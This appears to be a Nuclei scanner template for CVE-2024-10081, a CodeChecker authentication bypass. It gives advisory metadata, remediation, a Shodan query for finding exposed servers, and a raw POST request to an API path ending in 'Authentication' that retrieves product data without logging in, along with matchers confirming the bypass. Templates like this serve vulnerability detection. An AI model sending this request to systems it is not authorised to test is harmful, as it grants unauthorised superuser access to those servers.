id: CVE-2024-10081 info: name: CodeChecker <= 6.24.1 - Authentication Bypass author: iamnoooob,rootxharsh,pdresearch severity: critical description: | Authentication bypass occurs when the API URL ends with Authentication, Configuration or ServerInfo. This bypass allows superuser access to all API endpoints other than Authentication. These endpoints include the ability to add, edit, and remove products, among others. impact: | Unauthenticated attackers can bypass authentication by crafting API URLs ending with specific keywords, gaining superuser access to all API endpoints including product management and configuration. remediation: | Upgrade CodeChecker to version 6.24.2 or later. reference: - https://github.com/advisories/GHSA-f3f8-vx3w-hp5q - https://github.com/Ericsson/codechecker/security/advisories/GHSA-f3f8-vx3w-hp5q - https://nvd.nist.gov/vuln/detail/CVE-2024-10081 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N cvss-score: 10 cve-id: CVE-2024-10081 cwe-id: CWE-288 epss-score: 0.38961 epss-percentile: 0.98435 metadata: verified: true max-request: 1 shodan-query: http.favicon.hash:-1496590341 tags: cve,cve2024,code-checker,auth-bypass,vkev,vuln http: - raw: - | POST /v6.58/Products/Authentication HTTP/1.1 Host: {{Hostname}} [1,"getProducts",1,1,{}] matchers: - type: dsl dsl: - 'contains(body,"{\"0\":{\"lst\":[\"rec\",")' - "!contains(body,'Error code 401: Unauthorized')" - "contains(header,'application/x-thrift')" condition: and # digest: 4a0a00473045022100b8fc1c8a5197ae5c25b1844fffb96eb1870020c62fe60139bcc529174359a8410220628ef364ed15b7e8a425a4d8c9c19979b6c30400dc819696f2fea4457f618eef:922c64590222798bb761d5b6d8e72950